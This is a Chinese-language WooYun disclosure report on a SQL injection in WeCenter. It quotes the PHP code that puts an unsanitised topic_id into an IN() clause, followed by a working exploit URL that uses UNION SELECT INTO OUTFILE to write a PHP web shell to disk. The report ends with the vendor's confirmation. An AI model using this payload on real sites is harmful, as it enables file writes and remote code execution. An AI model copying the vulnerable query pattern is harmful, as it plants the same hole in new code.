漏洞概要

缺陷编号: WooYun-2015-106369

漏洞标题: WeCenter SQL注射(ROOT SHELL)

相关厂商: anwsion.com

漏洞作者: 路人甲

提交时间: 2015-04-09 12:49

公开时间: 2015-07-12 15:02

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org

Tags标签: 无


漏洞详情

披露状态:

2015-04-09: 细节已通知厂商并且等待厂商处理中
2015-04-13: 厂商已经确认,细节仅向厂商公开
2015-04-16: 细节向第三方安全合作伙伴开放
2015-06-07: 细节向核心白帽子及相关领域专家公开
2015-06-17: 细节向普通白帽子公开
2015-06-27: 细节向实习白帽子公开
2015-07-12: 细节向公众公开

简要描述:

WeCenter SQL注射(ROOT SHELL)

详细说明:

ajax.php:
public function question_list_action()
{
if ($_GET['feature_id'])
{
if ($topic_ids = $this->model('feature')->get_topics_by_feature_id($_GET['feature_id']))
{
$_GET['topic_id'] = implode(',', $topic_ids);
}
}
switch ($_GET['type'])
{
case 'best':
$action_list = $this->model('topic')->get_topic_best_answer_action_list($_GET['topic_id'], $this->user_id, intval($_GET['page']) * get_setting('contents_per_page') . ', ' . get_setting('contents_per_page'))


topic.php:
public function get_topic_best_answer_action_list($topic_ids, $uid, $limit)
{
$cache_key = 'topic_best_answer_action_list_' . md5($topic_ids . $limit);
if (!$result = AWS_APP::cache()->get($cache_key))
{
echo " WHERE topic_id IN (" . implode(',', explode(',', $topic_ids)) . ") AND `type` = 'question'";
if ($topic_relation = $this->query_all("SELECT item_id FROM " . $this->get_table('topic_relation') . " WHERE topic_id IN (" . implode(',', explode(',', $topic_ids)) . ") AND `type` = 'question'"))


ROOT SHELL


url:
http://localhost/WeCenter/UPLOAD/?/topic/ajax/question_list/type-best&topic_id=1%29%20union%20select%20%27%3C%3Fphp%20phpinfo%28%29%3B%3F%3E%27%20into%20outfile%20%27D%3A%2fshell.php%27%23
然后就在d盘生成shell

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-04-13 15:01

厂商回复:

谢谢提醒!十分感谢!!

最新状态:

暂无


漏洞评价:

评论